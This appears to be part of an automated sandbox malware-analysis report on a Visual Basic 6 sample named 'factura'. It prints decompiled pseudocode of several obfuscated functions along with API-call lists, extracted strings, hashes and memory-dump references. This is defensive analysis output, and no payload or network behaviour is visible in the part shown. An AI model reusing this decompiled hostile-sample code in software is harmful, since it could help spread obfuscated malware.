__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004026D4,00000040), ref: 0040962A
__vbaFreeObj.MSVBVM60(00000000,00000000,004026D4,00000040), ref: 0040963B
__vbaVarErrI4.MSVBVM60(?,00000889), ref: 00409649
#559.MSVBVM60(00000000,?,00000889), ref: 0040964F
__vbaFreeVar.MSVBVM60(00000000,?,00000889), ref: 00409666
__vbaNew2.MSVBVM60(004026E4,0040C33C,00000000,?,00000889), ref: 00409686
__vbaObjSetAddref.MSVBVM60(?,?,00000000,?,00000889), ref: 004096AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000010), ref: 004096D3
__vbaFreeObj.MSVBVM60(00000000,?,004026D4,00000010), ref: 004096E4
__vbaFreeStr.MSVBVM60(0040970C,00000000,?,00000889), ref: 00409706

Strings

Costards1, xrefs: 004095F5

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$CheckFreeHresult$New2$#559AddrefChkstkCopy
String ID: Costards1
API String ID: 2062356824-983065347
Opcode ID: 79320e2258aa1bd2f54c550f4a784e0edc4bd1abc6baadf7dc0da4e9e2974dd9
Instruction ID: 9696c91850d8b0885cc38532748bce0871f5c0a065db3ae38637a4983a0ef20f
Opcode Fuzzy Hash: 79320e2258aa1bd2f54c550f4a784e0edc4bd1abc6baadf7dc0da4e9e2974dd9
Instruction Fuzzy Hash: B4811270D10209EFCF00EFA1D989BADBBB4AF18304F20852AF505BB2E1DB795945DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A68E, Relevance: 33.3, APIs: 16, Strings: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E0040A68E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				signed int _t31;
				char* _t34;
				char* _t35;
				intOrPtr _t52;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t31 = 0x38;
				L00401420();
				_v12 = _t52;
				_v8 = 0x4013c8;
				L0040163C();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x402bb8);
				_push(_v36);
				L004014DA();
				L00401678();
				_push(_v36);
				_push(0x402bc0);
				L0040167E();
				if(_t31 != 0) {
					_push(0x3e);
					L00401642();
					_v32 = _t31;
				}
				_push(0x4029c4);
				L004014D4();
				if(_t31 != 1) {
					if( *0x40c33c != 0) {
						_v72 = 0x40c33c;
					} else {
						_push(0x40c33c);
						_push(0x4026e4);
						L0040165A();
						_v72 = 0x40c33c;
					}
					_v60 =  *_v72;
					_t34 =  &_v56;
					L0040152E();
					L00401534();
					_t35 =  &_v40;
					L00401582();
					_t31 =  *((intOrPtr*)( *_v60 + 0xc))(_v60, _t35, _t35, _t34, _t34, _t34, _v28, L"YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30", 0);
					asm("fclex");
					_v64 = _t31;
					if(_v64 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x4026d4);
						_push(_v60);
						_push(_v64);
						L00401654();
						_v76 = _t31;
					}
					L004015E8();
					L0040164E();
				}
				_v24 = 0x3b49;
				_push(E0040A7DD);
				L004015E8();
				L0040166C();
				return _t31;
			}

0x0040a693
0x0040a69e
0x0040a69f
0x0040a6a8
0x0040a6a9
0x0040a6b1
0x0040a6b4
0x0040a6c3
0x0040a6c8
0x0040a6ca
0x0040a6cc
0x0040a6ce
0x0040a6d0
0x0040a6d5
0x0040a6d8
0x0040a6e2
0x0040a6e7
0x0040a6ea
0x0040a6ef
0x0040a6f6
0x0040a6f8
0x0040a6fa
0x0040a6ff
0x0040a6ff
0x0040a702
0x0040a707
0x0040a710
0x0040a71d
0x0040a737
0x0040a71f
0x0040a71f
0x0040a724
0x0040a729
0x0040a72e
0x0040a72e
0x0040a743
0x0040a750
0x0040a754
0x0040a75d
0x0040a763
0x0040a767
0x0040a775
0x0040a778
0x0040a77a
0x0040a781
0x0040a79a
0x0040a783
0x0040a783
0x0040a785
0x0040a78a
0x0040a78d
0x0040a790
0x0040a795
0x0040a795
0x0040a7a1
0x0040a7a9
0x0040a7a9
0x0040a7ae
0x0040a7b4
0x0040a7cf
0x0040a7d7
0x0040a7dc

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A6A9
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0040A6C3
#712.MSVBVM60(?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6D8
__vbaStrMove.MSVBVM60(?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6E2
__vbaStrCmp.MSVBVM60(00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6EF
#569.MSVBVM60(0000003E,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A6FA
__vbaI2Str.MSVBVM60(004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A707
__vbaNew2.MSVBVM60(004026E4,0040C33C,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A729
__vbaLateMemCallLd.MSVBVM60(?,?,YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30,00000000,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000), ref: 0040A754
__vbaObjVar.MSVBVM60(00000000), ref: 0040A75D
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0040A767
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000000C), ref: 0040A790
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040A7A1
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040A7A9
__vbaFreeObj.MSVBVM60(0040A7DD,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A7CF
__vbaFreeStr.MSVBVM60(0040A7DD,004029C4,00402BC0,?,?,00402BB8,00000000,00000001,000000FF,00000000,?,?,?,?,00401426), ref: 0040A7D7

Strings

cer, xrefs: 0040A6BB
YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30, xrefs: 0040A748
I;, xrefs: 0040A7AE

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$#569#712AddrefCallCheckChkstkCopyHresultLateMoveNew2
String ID: I;$YshaTdDpqZtHpPVHAZxRsD7IbMZuVtf30$cer
API String ID: 1705650133-4229211588
Opcode ID: 149c752a26b154fa0079304a3fd2b8ac76c1e9712543000bd852778128dc6841
Instruction ID: fbdb504a882c2f443251f9ac37b7be8229b5af5a59ddeca6139be7c72cb4a837
Opcode Fuzzy Hash: 149c752a26b154fa0079304a3fd2b8ac76c1e9712543000bd852778128dc6841
Instruction Fuzzy Hash: 9F313771950208BBCF14EBA1DD86FADBBB4AF14704F60853BF001761F1DABDA9418B59

Uniqueness

Uniqueness Score: -1.00%

Function 00409E55, Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00409E55(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				char* _v28;
				void* _v32;
				short _v36;
				void* _v52;
				char _v56;
				char _v72;
				char _v88;
				char* _v96;
				intOrPtr _v104;
				short _v108;
				signed int _t30;
				char* _t34;
				char* _t39;
				void* _t51;
				void* _t53;
				long long* _t54;
				char* _t55;
				long long _t56;

				_t56 = __fp0;
				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				L00401420();
				_v16 = _t54;
				_v12 = 0x401360;
				_v8 = 0;
				_t30 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x401426, _t51);
				L0040163C();
				_push(2);
				_push(0x402adc);
				L00401510();
				L00401678();
				_push(_t30);
				_push(0x402ae8);
				L0040167E();
				asm("sbb eax, eax");
				_v108 =  ~( ~( ~_t30));
				_t39 =  &_v56;
				L0040166C();
				_t34 = _v108;
				_t55 = _t34;
				if(_t55 != 0) {
					_push(0xc9);
					L00401642();
					_v28 = _t34;
				}
				asm("fldz");
				_push(_t39);
				_push(_t39);
				 *_t54 = _t56;
				L0040150A();
				L004015F4();
				asm("fcomp qword [0x401358]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t55 != 0) {
					_v96 = L"GASTROCHAENA";
					_v104 = 8;
					L004015BE();
					_push( &_v72);
					_t34 =  &_v88;
					_push(_t34);
					L00401504();
					L00401630();
					L0040164E();
				}
				_v36 = 0x3a9a;
				asm("wait");
				_push(E00409F79);
				L0040166C();
				L0040164E();
				return _t34;
			}

0x00409e55
0x00409e58
0x00409e67
0x00409e71
0x00409e79
0x00409e7c
0x00409e83
0x00409e92
0x00409e9b
0x00409ea0
0x00409ea2
0x00409ea7
0x00409eb1
0x00409eb6
0x00409eb7
0x00409ebc
0x00409ec3
0x00409ec9
0x00409ecd
0x00409ed0
0x00409ed5
0x00409ed9
0x00409edb
0x00409edd
0x00409ee2
0x00409ee7
0x00409ee7
0x00409eea
0x00409eec
0x00409eed
0x00409eee
0x00409ef1
0x00409ef6
0x00409efb
0x00409f01
0x00409f03
0x00409f04
0x00409f06
0x00409f0d
0x00409f1a
0x00409f22
0x00409f23
0x00409f26
0x00409f27
0x00409f32
0x00409f3a
0x00409f3a
0x00409f3f
0x00409f45
0x00409f46
0x00409f6b
0x00409f73
0x00409f78

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409E71
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409E9B
#512.MSVBVM60(00402ADC,00000002,?,?,?,?,00401426), ref: 00409EA7
__vbaStrMove.MSVBVM60(00402ADC,00000002,?,?,?,?,00401426), ref: 00409EB1
__vbaStrCmp.MSVBVM60(00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EBC
__vbaFreeStr.MSVBVM60(00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409ED0
#569.MSVBVM60(000000C9,00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EE2
#585.MSVBVM60(?,?,00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EF1
__vbaFpR8.MSVBVM60(?,?,00402AE8,00000000,00402ADC,00000002,?,?,?,?,00401426), ref: 00409EF6
__vbaVarDup.MSVBVM60 ref: 00409F1A
#666.MSVBVM60(?,?), ref: 00409F27
__vbaVarMove.MSVBVM60(?,?), ref: 00409F32
__vbaFreeVar.MSVBVM60(?,?), ref: 00409F3A
__vbaFreeStr.MSVBVM60(00409F79,?,?,00402AE8,00000000,00402ADC,00000002), ref: 00409F6B
__vbaFreeVar.MSVBVM60(00409F79,?,?,00402AE8,00000000,00402ADC,00000002), ref: 00409F73

Strings

GASTROCHAENA, xrefs: 00409F06
*@, xrefs: 00409F70, 00409F2F

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$Move$#512#569#585#666ChkstkCopy
String ID: GASTROCHAENA$*@
API String ID: 1152186010-3897368032
Opcode ID: e8726b73bfd971d74fa60f51edeb8565b4532db6f9bd936a770290e02400ae0e
Instruction ID: 820aef93537f675536f56a744883c169d1da30338a64661390688f8281fc52e0
Opcode Fuzzy Hash: e8726b73bfd971d74fa60f51edeb8565b4532db6f9bd936a770290e02400ae0e
Instruction Fuzzy Hash: 1B21F970940209ABCB00EFA1CD56EAEB774AF40B04F54853AB002BB1E1DB7D5A05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAD5, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0040AAD5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char* _v52;
				intOrPtr _v60;
				intOrPtr _v84;
				intOrPtr _v92;
				short _v112;
				char* _t34;
				char* _t36;
				short _t37;
				intOrPtr _t63;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t63;
				_push(0x60);
				L00401420();
				_v12 = _t63;
				_v8 = 0x4013f8;
				_v52 = L"11-11-11";
				_v60 = 8;
				L004015BE();
				_t34 =  &_v44;
				_push(_t34);
				L0040157C();
				_v112 =  ~(0 | _t34 != 0x0000ffff);
				L0040164E();
				if(_v112 != 0) {
					_v52 = L"Overtook6";
					_v60 = 8;
					_v84 = 0x81d81b;
					_v92 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98");
					_push(_v28);
					L004015FA();
				}
				_v52 = L"11-11-11";
				_v60 = 8;
				L004015BE();
				_t36 =  &_v44;
				_push(_t36);
				L0040157C();
				_v112 =  ~(0 | _t36 != 0x0000ffff);
				L0040164E();
				_t37 = _v112;
				if(_t37 != 0) {
					_push(0x4e);
					L004014C8();
					_v24 = _t37;
				}
				_push(E0040ABFA);
				L004015E8();
				return _t37;
			}

0x0040aada
0x0040aae5
0x0040aae6
0x0040aaed
0x0040aaf0
0x0040aaf8
0x0040aafb
0x0040ab02
0x0040ab09
0x0040ab16
0x0040ab1b
0x0040ab1e
0x0040ab1f
0x0040ab2f
0x0040ab36
0x0040ab41
0x0040ab43
0x0040ab4a
0x0040ab51
0x0040ab58
0x0040ab5f
0x0040ab62
0x0040ab6c
0x0040ab6d
0x0040ab6e
0x0040ab6f
0x0040ab70
0x0040ab73
0x0040ab7d
0x0040ab7e
0x0040ab7f
0x0040ab80
0x0040ab81
0x0040ab83
0x0040ab88
0x0040ab8b
0x0040ab90
0x0040ab93
0x0040ab9a
0x0040aba7
0x0040abac
0x0040abaf
0x0040abb0
0x0040abc0
0x0040abc7
0x0040abcc
0x0040abd2
0x0040abd4
0x0040abd6
0x0040abde
0x0040abde
0x0040abe1
0x0040abf4
0x0040abf9

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040AAF0
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AB16
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AB1F
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040AB36
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040AB62
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0040AB73
__vbaLateMemCall.MSVBVM60(?,kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98,00000002,?,?,?,?,?,?,?,?), ref: 0040AB8B
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABA7
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABB0
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABC7
#571.MSVBVM60(0000004E,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABD6
__vbaFreeObj.MSVBVM60(0040ABFA,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040ABF4

Strings

kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98, xrefs: 0040AB83
Overtook6, xrefs: 0040AB43
11-11-11, xrefs: 0040AB02, 0040AB93

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$ChkstkFree$#557$#571CallLate
String ID: 11-11-11$Overtook6$kwpMfZtqZUw37TQwtCoWsmt1kuZ05sExfVA1d98
API String ID: 3750654714-3297755928
Opcode ID: e14d764c0df143388987e10003d0bc8cbb9a7b4787ab51dbc2e01cf67aafef8d
Instruction ID: 5829a43268710e35ae73b5e63829790e3dd3fe720ed5a1d00a0d7345b5942c17
Opcode Fuzzy Hash: e14d764c0df143388987e10003d0bc8cbb9a7b4787ab51dbc2e01cf67aafef8d
Instruction Fuzzy Hash: 58317E70900309ABDB04DFA1D886BEEBBB9AF05B04F44453AF501BB1E0DBB855898B59

Uniqueness

Uniqueness Score: -1.00%

Function 00409270, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00409270(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				char* _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				intOrPtr _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				char* _t64;
				signed int _t71;
				signed int _t76;
				signed int _t77;
				void* _t92;
				void* _t94;
				intOrPtr _t95;

				_t95 = _t94 - 0xc;
				 *[fs:0x0] = _t95;
				L00401420();
				_v16 = _t95;
				_v12 = 0x4012b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t92);
				_v68 = 0x4029c4;
				_v76 = 8;
				_v84 = 1;
				_v92 = 0x8002;
				_push( &_v76);
				_t64 =  &_v92;
				_push(_t64);
				L00401612();
				if(_t64 != 0) {
					_v68 = L"Solicits9";
					_v76 = 8;
					_v100 = 0xdb81d;
					_v108 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"chtN96");
					_push(_v32);
					L004015FA();
				}
				if( *0x40c33c != 0) {
					_v156 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026e4);
					L0040165A();
					_v156 = 0x40c33c;
				}
				_v128 =  *_v156;
				_t71 =  *((intOrPtr*)( *_v128 + 0x14))(_v128,  &_v44);
				asm("fclex");
				_v132 = _t71;
				if(_v132 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026d4);
					_push(_v128);
					_push(_v132);
					L00401654();
					_v160 = _t71;
				}
				_v136 = _v44;
				_t76 =  *((intOrPtr*)( *_v136 + 0xe8))(_v136,  &_v40);
				asm("fclex");
				_v140 = _t76;
				if(_v140 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x402934);
					_push(_v136);
					_push(_v140);
					L00401654();
					_v164 = _t76;
				}
				_t77 = _v40;
				_v152 = _t77;
				_v40 = _v40 & 0x00000000;
				L00401678();
				L004015E8();
				_v28 = 0x2e8f;
				_push(E0040945C);
				L004015E8();
				L0040166C();
				return _t77;
			}

0x00409273
0x00409282
0x0040928e
0x00409296
0x00409299
0x004092a0
0x004092af
0x004092b2
0x004092b9
0x004092c0
0x004092c7
0x004092d1
0x004092d2
0x004092d5
0x004092d6
0x004092e0
0x004092e2
0x004092e9
0x004092f0
0x004092f7
0x004092fe
0x00409301
0x0040930b
0x0040930c
0x0040930d
0x0040930e
0x0040930f
0x00409312
0x0040931c
0x0040931d
0x0040931e
0x0040931f
0x00409320
0x00409322
0x00409327
0x0040932a
0x0040932f
0x00409339
0x00409356
0x0040933b
0x0040933b
0x00409340
0x00409345
0x0040934a
0x0040934a
0x00409368
0x00409377
0x0040937a
0x0040937c
0x00409383
0x0040939f
0x00409385
0x00409385
0x00409387
0x0040938c
0x0040938f
0x00409392
0x00409397
0x00409397
0x004093a9
0x004093c1
0x004093c7
0x004093c9
0x004093d6
0x004093fb
0x004093d8
0x004093d8
0x004093dd
0x004093e2
0x004093e8
0x004093ee
0x004093f3
0x004093f3
0x00409402
0x00409405
0x0040940b
0x00409418
0x00409420
0x00409425
0x0040942b
0x0040944e
0x00409456
0x0040945b

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040928E
__vbaVarTstNe.MSVBVM60(00008002,00000008), ref: 004092D6
__vbaChkstk.MSVBVM60(?,?,00008002,00000008), ref: 00409301
__vbaChkstk.MSVBVM60(?,?,00008002,00000008), ref: 00409312
__vbaLateMemCall.MSVBVM60(?,chtN96,00000002,?,?,00008002,00000008), ref: 0040932A
__vbaNew2.MSVBVM60(004026E4,0040C33C,00008002,00000008), ref: 00409345
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 00409392
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,000000E8), ref: 004093EE
__vbaStrMove.MSVBVM60 ref: 00409418
__vbaFreeObj.MSVBVM60 ref: 00409420
__vbaFreeObj.MSVBVM60(0040945C), ref: 0040944E
__vbaFreeStr.MSVBVM60(0040945C), ref: 00409456

Strings

Solicits9, xrefs: 004092E2
chtN96, xrefs: 00409322

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$ChkstkFree$CheckHresult$CallLateMoveNew2
String ID: Solicits9$chtN96
API String ID: 86130054-2940086331
Opcode ID: 8dd3d24ee122c9ae043efbb72a20e6b572157bfcb6f0737ba2d1292a0c66ed10
Instruction ID: efbcb55593de333b7ffc91ee1c8707e4c98f873287b5aa52e7dc53282853c468
Opcode Fuzzy Hash: 8dd3d24ee122c9ae043efbb72a20e6b572157bfcb6f0737ba2d1292a0c66ed10
Instruction Fuzzy Hash: 16510971D00218DBDB10DF95C886BDDBBB4BF08308F5085AAE449BB2E2CBB95985DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040A266, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0040A266(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				short _v32;
				char* _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				intOrPtr _v104;
				intOrPtr _v112;
				char* _v136;
				char _v144;
				intOrPtr _v168;
				intOrPtr _v176;
				short _v196;
				short _t49;
				short _t54;
				void* _t70;
				void* _t72;
				intOrPtr _t73;

				_t73 = _t72 - 0xc;
				 *[fs:0x0] = _t73;
				L00401420();
				_v16 = _t73;
				_v12 = 0x401398;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t70);
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0xc;
				_v48 = 2;
				_push(1);
				_push(1);
				_push( &_v64);
				_push( &_v48);
				_push( &_v80);
				L004014F2();
				_v136 = 0xc;
				_v144 = 0x8002;
				_push( &_v80);
				_t49 =  &_v144;
				_push(_t49);
				L00401612();
				_v196 = _t49;
				_push( &_v80);
				_push( &_v64);
				_push( &_v48);
				_push(3);
				L00401600();
				if(_v196 != 0) {
					_v104 = _a4;
					_v112 = 9;
					_v136 = L"rigmand";
					_v144 = 8;
					_v168 = 0x77553b;
					_v176 = 3;
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"ISA93");
					_push(_v28);
					L004015FA();
				}
				_v40 = 0x80020004;
				_v48 = 0xa;
				_t54 =  &_v48;
				_push(_t54);
				L0040155E();
				_v32 = _t54;
				L0040164E();
				_push(E0040A3F7);
				L004015E8();
				return _t54;
			}

0x0040a269
0x0040a278
0x0040a284
0x0040a28c
0x0040a28f
0x0040a296
0x0040a2a5
0x0040a2a8
0x0040a2af
0x0040a2b6
0x0040a2bd
0x0040a2c4
0x0040a2c6
0x0040a2cb
0x0040a2cf
0x0040a2d3
0x0040a2d4
0x0040a2d9
0x0040a2e3
0x0040a2f0
0x0040a2f1
0x0040a2f7
0x0040a2f8
0x0040a2fd
0x0040a307
0x0040a30b
0x0040a30f
0x0040a310
0x0040a312
0x0040a323
0x0040a32c
0x0040a32f
0x0040a336
0x0040a340
0x0040a34a
0x0040a354
0x0040a35e
0x0040a361
0x0040a36b
0x0040a36c
0x0040a36d
0x0040a36e
0x0040a36f
0x0040a372
0x0040a37f
0x0040a380
0x0040a381
0x0040a382
0x0040a383
0x0040a386
0x0040a393
0x0040a394
0x0040a395
0x0040a396
0x0040a397
0x0040a399
0x0040a39e
0x0040a3a1
0x0040a3a6
0x0040a3a9
0x0040a3b0
0x0040a3b7
0x0040a3ba
0x0040a3bb
0x0040a3c0
0x0040a3c7
0x0040a3cc
0x0040a3f1
0x0040a3f6

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A284
#660.MSVBVM60(?,00000002,0000000A,00000001,00000001), ref: 0040A2D4
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 0040A2F8
__vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?,00008002,?), ref: 0040A312
__vbaChkstk.MSVBVM60 ref: 0040A361
__vbaChkstk.MSVBVM60 ref: 0040A372
__vbaChkstk.MSVBVM60 ref: 0040A386
__vbaLateMemCall.MSVBVM60(?,ISA93,00000003), ref: 0040A3A1
#648.MSVBVM60(0000000A), ref: 0040A3BB
__vbaFreeVar.MSVBVM60(0000000A), ref: 0040A3C7
__vbaFreeObj.MSVBVM60(0040A3F7,0000000A), ref: 0040A3F1

Strings

rigmand, xrefs: 0040A336
;Uw, xrefs: 0040A34A
ISA93, xrefs: 0040A399

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Chkstk$Free$#648#660CallLateList
String ID: ;Uw$ISA93$rigmand
API String ID: 2694029159-1757006994
Opcode ID: 9d9859830ffe460deb63b6dfd3090830d123d2e9c16b5688880ef22a3c10ea4d
Instruction ID: cd45b93c9e3a27016b7ebc6b48013dddeac0324bcd3bb2e7b406c3fa7f70fadf
Opcode Fuzzy Hash: 9d9859830ffe460deb63b6dfd3090830d123d2e9c16b5688880ef22a3c10ea4d
Instruction Fuzzy Hash: 98415F71D00308EBDB11DF95C846BCEB7B9BF05704F40846AF904BB291DBB99A458F65

Uniqueness

Uniqueness Score: -1.00%

